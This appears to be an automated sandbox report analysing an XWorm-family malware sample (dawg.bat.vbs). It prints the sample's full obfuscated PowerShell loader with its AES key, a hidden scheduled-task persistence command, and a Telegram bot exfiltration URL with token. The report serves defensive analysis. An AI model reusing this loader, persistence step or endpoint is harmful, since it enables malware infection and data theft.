Analysis
-
max time kernel
116s -
max time network
115s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25-09-2024 13:10
Static task
static1
Behavioral task
behavioral1
Sample
dawg.bat.vbs
Resource
win10-20240404-en
General
-
Target
dawg.bat.vbs
-
Size
47KB
-
MD5
2d4b3f85f3619e096e14096a0849fbf9
-
SHA1
c9aa9a3f00830625ff3f806d0b0d6a22ac3a7d93
-
SHA256
49a7db4ab12330edff1ef80c5e0c9c93d69c4fe36e4ae25eb92d311be55baf66
-
SHA512
42f220a2dee917c3c14164a4fe2399e196218fcea7bc5d56afee6c08ac0bf88b765a9e5bda1cff5f17d59d85800575ceba26819116ca33829a27abed2b53c4aa
-
SSDEEP
768:0yWnyN9IbUZIYiztjyHg6QihA1WmmaMj17Hln1nVrV:0E9XqYwtWAb1DmdxLln5
Malware Config
Extracted
xworm
5.0
Extracted
gurcu
https://api.telegram.org/bot7533145045:AAGnW8Bkr0_G1f_ZxiKTve5hlRZjphTc0aM/sendMessage?chat_id=-4512836800
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/3196-51-0x0000016B2EF30000-0x0000016B2EF3E000-memory.dmp family_xworm -
Blocklisted process makes network request 2 IoCs
flow pid Process 44 3196 powershell.exe 46 3196 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1244 powershell.exe 4172 powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings taskmgr.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2764 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 57 IoCs
pid Process 3196 powershell.exe 3196 powershell.exe 1244 powershell.exe 1244 powershell.exe 388 powershell.exe 388 powershell.exe 4172 powershell.exe 4172 powershell.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3196 powershell.exe Token: SeDebugPrivilege 1244 powershell.exe Token: SeDebugPrivilege 388 powershell.exe Token: SeIncreaseQuotaPrivilege 388 powershell.exe Token: SeSecurityPrivilege 388 powershell.exe Token: SeTakeOwnershipPrivilege 388 powershell.exe Token: SeLoadDriverPrivilege 388 powershell.exe Token: SeSystemProfilePrivilege 388 powershell.exe Token: SeSystemtimePrivilege 388 powershell.exe Token: SeProfSingleProcessPrivilege 388 powershell.exe Token: SeIncBasePriorityPrivilege 388 powershell.exe Token: SeCreatePagefilePrivilege 388 powershell.exe Token: SeBackupPrivilege 388 powershell.exe Token: SeRestorePrivilege 388 powershell.exe Token: SeShutdownPrivilege 388 powershell.exe Token: SeDebugPrivilege 388 powershell.exe Token: SeSystemEnvironmentPrivilege 388 powershell.exe Token: SeRemoteShutdownPrivilege 388 powershell.exe Token: SeUndockPrivilege 388 powershell.exe Token: SeManageVolumePrivilege 388 powershell.exe Token: 33 388 powershell.exe Token: 34 388 powershell.exe Token: 35 388 powershell.exe Token: 36 388 powershell.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeIncreaseQuotaPrivilege 4172 powershell.exe Token: SeSecurityPrivilege 4172 powershell.exe Token: SeTakeOwnershipPrivilege 4172 powershell.exe Token: SeLoadDriverPrivilege 4172 powershell.exe Token: SeSystemProfilePrivilege 4172 powershell.exe Token: SeSystemtimePrivilege 4172 powershell.exe Token: SeProfSingleProcessPrivilege 4172 powershell.exe Token: SeIncBasePriorityPrivilege 4172 powershell.exe Token: SeCreatePagefilePrivilege 4172 powershell.exe Token: SeBackupPrivilege 4172 powershell.exe Token: SeRestorePrivilege 4172 powershell.exe Token: SeShutdownPrivilege 4172 powershell.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeSystemEnvironmentPrivilege 4172 powershell.exe Token: SeRemoteShutdownPrivilege 4172 powershell.exe Token: SeUndockPrivilege 4172 powershell.exe Token: SeManageVolumePrivilege 4172 powershell.exe Token: 33 4172 powershell.exe Token: 34 4172 powershell.exe Token: 35 4172 powershell.exe Token: 36 4172 powershell.exe Token: SeIncreaseQuotaPrivilege 4172 powershell.exe Token: SeSecurityPrivilege 4172 powershell.exe Token: SeTakeOwnershipPrivilege 4172 powershell.exe Token: SeLoadDriverPrivilege 4172 powershell.exe Token: SeSystemProfilePrivilege 4172 powershell.exe Token: SeSystemtimePrivilege 4172 powershell.exe Token: SeProfSingleProcessPrivilege 4172 powershell.exe Token: SeIncBasePriorityPrivilege 4172 powershell.exe Token: SeCreatePagefilePrivilege 4172 powershell.exe Token: SeBackupPrivilege 4172 powershell.exe Token: SeRestorePrivilege 4172 powershell.exe Token: SeShutdownPrivilege 4172 powershell.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeSystemEnvironmentPrivilege 4172 powershell.exe Token: SeRemoteShutdownPrivilege 4172 powershell.exe Token: SeUndockPrivilege 4172 powershell.exe Token: SeManageVolumePrivilege 4172 powershell.exe Token: 33 4172 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe 3156 taskmgr.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 4292 wrote to memory of 2924 4292 cmd.exe 97 PID 4292 wrote to memory of 2924 4292 cmd.exe 97 PID 4292 wrote to memory of 3196 4292 cmd.exe 98 PID 4292 wrote to memory of 3196 4292 cmd.exe 98 PID 3196 wrote to memory of 1244 3196 powershell.exe 99 PID 3196 wrote to memory of 1244 3196 powershell.exe 99 PID 3196 wrote to memory of 388 3196 powershell.exe 100 PID 3196 wrote to memory of 388 3196 powershell.exe 100 PID 3196 wrote to memory of 4172 3196 powershell.exe 102 PID 3196 wrote to memory of 4172 3196 powershell.exe 102
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dawg.bat.vbs"1⤵PID:4516
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5108
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\dawg.bat1⤵
- Opens file in notepad (likely ransom note)
PID:2764
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dawg.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('xkyHsUEz3I6ELu2lR0z7m6Kw05wb28L/CX73bVCU13U='); $aes_var.IV=[System.Convert]::FromBase64String('/jm5YEgLEZRhB2OjwCSNTQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$nShDB=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$qhgjI=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$CCizP=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($nShDB, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $CCizP.CopyTo($qhgjI); $CCizP.Dispose(); $nShDB.Dispose(); $qhgjI.Dispose(); $qhgjI.ToArray();}function execute_function($param_var,$param2_var){ IEX '$FvEfJ=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$fCCPt=$FvEfJ.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$fCCPt.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$bqfmX = 'C:\Users\Admin\AppData\Local\Temp\dawg.bat';$host.UI.RawUI.WindowTitle = $bqfmX;$ZowMM=[System.IO.File]::ReadAllText($bqfmX).Split([Environment]::NewLine);foreach ($WJela in $ZowMM) { if ($WJela.StartsWith('THuwPURqSTjmbbqbMgKM')) { $jeKym=$WJela.Substring(20); break; }}$payloads_var=[string[]]$jeKym.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵PID:2924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\dawg')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4172
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3156
-
C:\Windows\System32\u5btjl.exe"C:\Windows\System32\u5btjl.exe"1⤵PID:4540
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53f01549ee3e4c18244797530b588dad9
SHA13e87863fc06995fe4b741357c68931221d6cc0b9
SHA25636b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA51273843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50
-
Filesize
1KB
MD5f3b2f7c8e9b3057a4342efce5cb1f648
SHA1cbcab1b48cd397259c504d2c915c5c30ea877b06
SHA2562c3dc036ac8d51e14510a0a6bba650d29e55c394b3b564a5f762c2fc1ebc3693
SHA512f627a062084919835cdfadcaa06849d6a636e4b2f6a24317c29e78183c02b4e2ffa9cf0911f627efc2143514695a1b3e70141866f61c722039721182cd5fb142
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
47KB
MD5073e8ce3a87c133cabd84d12c6990184
SHA1c87a8c689e0dec58859d85da23b92c2afaa7bec8
SHA256b5db9ff887bfca1d6958008ea6c7af8e6923207f58d2be478201fb35375241ff
SHA5122eb19e3cc22c9d50a87ffd894f4927fafe3a106ebfdc9e23000674287cd5fd73f262998ff5018ee59dddb041cf13cc5d0de3c759cf923a94d7e7d4931de644b7